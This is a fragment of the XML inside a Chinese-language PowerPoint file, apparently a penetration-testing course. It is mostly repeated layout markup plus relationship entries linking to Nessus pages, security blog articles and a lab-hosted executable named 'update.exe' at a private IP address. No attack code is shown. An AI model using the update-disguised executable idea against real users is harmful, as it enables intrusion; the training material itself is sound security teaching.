          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="717550" y="188913"/>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二</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1331913" y="188913"/>
            <a:ext cx="4937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三</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1919288" y="188913"/>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四</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2533650" y="188913"/>
            <a:ext cx="4937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五</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3135313" y="174625"/>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六</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9067800" y="374650"/>
            <a:ext cx="27432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1045C9"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{4B9E8624-35F8-4DE1-9A58-BACFB07633DF}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>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内页">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2" name="直接连接符 1"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="811213"/>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矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="3792538" cy="812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椭圆 3"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="101600" y="130175"/>
            <a:ext cx="550863"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椭圆 4"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703263" y="130175"/>
            <a:ext cx="550862"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椭圆 5"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1303338" y="130175"/>
            <a:ext cx="550862" cy="5524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椭圆 6"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905000" y="130175"/>
            <a:ext cx="550863"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椭圆 7"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2505075" y="130175"/>
            <a:ext cx="550863"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椭圆 8"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3106738" y="130175"/>
            <a:ext cx="550862"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TextBox 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="130175" y="174625"/>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一</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="717550" y="188913"/>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二</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1331913" y="188913"/>
            <a:ext cx="4937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三</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1919288" y="188913"/>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四</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2533650" y="188913"/>
            <a:ext cx="4937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五</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3135313" y="174625"/>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六</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9067800" y="374650"/>
            <a:ext cx="27432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1045C9"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{F57EF2B7-EA84-4D18-A666-E3336DCD7AF2}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>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内页">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2" name="直接连接符 1"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="811213"/>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矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="3792538" cy="812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椭圆 3"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="101600" y="130175"/>
            <a:ext cx="550863"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椭圆 4"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703263" y="130175"/>
            <a:ext cx="550862"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椭圆 5"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1303338" y="130175"/>
            <a:ext cx="550862"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椭圆 6"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905000" y="130175"/>
            <a:ext cx="550863" cy="5524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椭圆 7"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2505075" y="130175"/>
            <a:ext cx="550863"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椭圆 8"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3106738" y="130175"/>
            <a:ext cx="550862"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TextBox 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="130175" y="174625"/>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一</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="717550" y="188913"/>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二</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1331913" y="188913"/>
            <a:ext cx="4937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三</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1919288" y="188913"/>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四</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2533650" y="188913"/>
            <a:ext cx="4937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五</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3135313" y="174625"/>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六</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9067800" y="374650"/>
            <a:ext cx="27432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1045C9"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{402AEF3A-1332-4A90-A026-1E99F12569FE}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>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内页">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2" name="直接连接符 1"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="811213"/>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矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="3792538" cy="812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椭圆 3"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="101600" y="130175"/>
            <a:ext cx="550863"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椭圆 4"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703263" y="130175"/>
            <a:ext cx="550862"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椭圆 5"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1303338" y="130175"/>
            <a:ext cx="550862"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椭圆 6"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905000" y="130175"/>
            <a:ext cx="550863"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椭圆 7"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2505075" y="130175"/>
            <a:ext cx="550863" cy="5524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椭圆 8"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3106738" y="130175"/>
            <a:ext cx="550862"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TextBox 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="130175" y="174625"/>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一</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="717550" y="188913"/>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二</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1331913" y="188913"/>
            <a:ext cx="4937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三</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1919288" y="188913"/>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四</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2533650" y="188913"/>
            <a:ext cx="4937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五</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3135313" y="174625"/>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六</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9067800" y="374650"/>
            <a:ext cx="27432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1045C9"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{0B99EA9A-B253-4B46-9287-E450B88B1AEA}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>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内页">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2" name="直接连接符 1"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="811213"/>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矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="3792538" cy="812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椭圆 3"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="101600" y="130175"/>
            <a:ext cx="550863"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椭圆 4"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703263" y="130175"/>
            <a:ext cx="550862"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椭圆 5"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1303338" y="130175"/>
            <a:ext cx="550862"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椭圆 6"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905000" y="130175"/>
            <a:ext cx="550863"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椭圆 7"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2505075" y="130175"/>
            <a:ext cx="550863"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椭圆 8"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3106738" y="130175"/>
            <a:ext cx="550862" cy="5524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TextBox 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="130175" y="174625"/>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一</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="717550" y="188913"/>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二</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1331913" y="188913"/>
            <a:ext cx="4937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三</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1919288" y="188913"/>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四</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2533650" y="188913"/>
            <a:ext cx="4937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五</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3135313" y="174625"/>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六</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9067800" y="374650"/>
            <a:ext cx="27432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1045C9"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{50B12A01-B2A8-44FC-ACAF-71B8827F4CE7}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>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A6852A-DBAF-BC9F-659F-80F4989A7E4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6F3B669-BE2A-553E-180F-87F1A7C9A21C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C33BF189-19F4-4844-AC19-43D41F3F00A4}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2024/10/18</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="页脚占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79A792F2-2523-8BAE-FF0F-D94CA468729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E7A156B-74A7-216C-0D70-11A937B235EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8610600" y="6356352"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{675771E8-9CBE-4D22-A992-57B4AD933210}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1425512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Tree>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
  <p:sldLayoutIdLst>
    <p:sldLayoutId id="2147484304" r:id="rId1"/>
    <p:sldLayoutId id="2147484305" r:id="rId2"/>
    <p:sldLayoutId id="2147484306" r:id="rId3"/>
    <p:sldLayoutId id="2147484307" r:id="rId4"/>
    <p:sldLayoutId id="2147484308" r:id="rId5"/>
    <p:sldLayoutId id="2147484309" r:id="rId6"/>
    <p:sldLayoutId id="2147484310" r:id="rId7"/>
    <p:sldLayoutId id="2147484311" r:id="rId8"/>
    <p:sldLayoutId id="2147484326" r:id="rId9"/>
    <p:sldLayoutId id="2147484342" r:id="rId10"/>
    <p:sldLayoutId id="2147484359" r:id="rId11"/>
    <p:sldLayoutId id="2147484360" r:id="rId12"/>
    <p:sldLayoutId id="2147484328" r:id="rId13"/>
    <p:sldLayoutId id="2147484343" r:id="rId14"/>
    <p:sldLayoutId id="2147484358" r:id="rId15"/>
  </p:sldLayoutIdLst>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hyperlink" Target="https://zhuanlan.zhihu.com/p/551712456"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hyperlink" Target="http://www.tenable.com/products/nessus/select-your-operating-system"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0.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/themeOverride" Target="../theme/themeOverride1.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide3.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bogon:8834/"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0.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10.xml"/><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hyperlink" Target="https://blog.csdn.net/qq_53517370/article/details/128984794" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide37.xml"/><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10.xml"/><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hyperlink" Target="http://192.168.77.128/update.exe" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide44.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout10.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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hyperlink" Target="https://zhuanlan.zhihu.com/p/388725815" TargetMode="External"/><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57.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout10.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image53.emf"/></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hyperlink" Target="https://so.csdn.net/so/search?q=%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95&amp;spm=1001.2101.3001.7020" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide60.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout10.xml"/><Relationship Id="rId4" 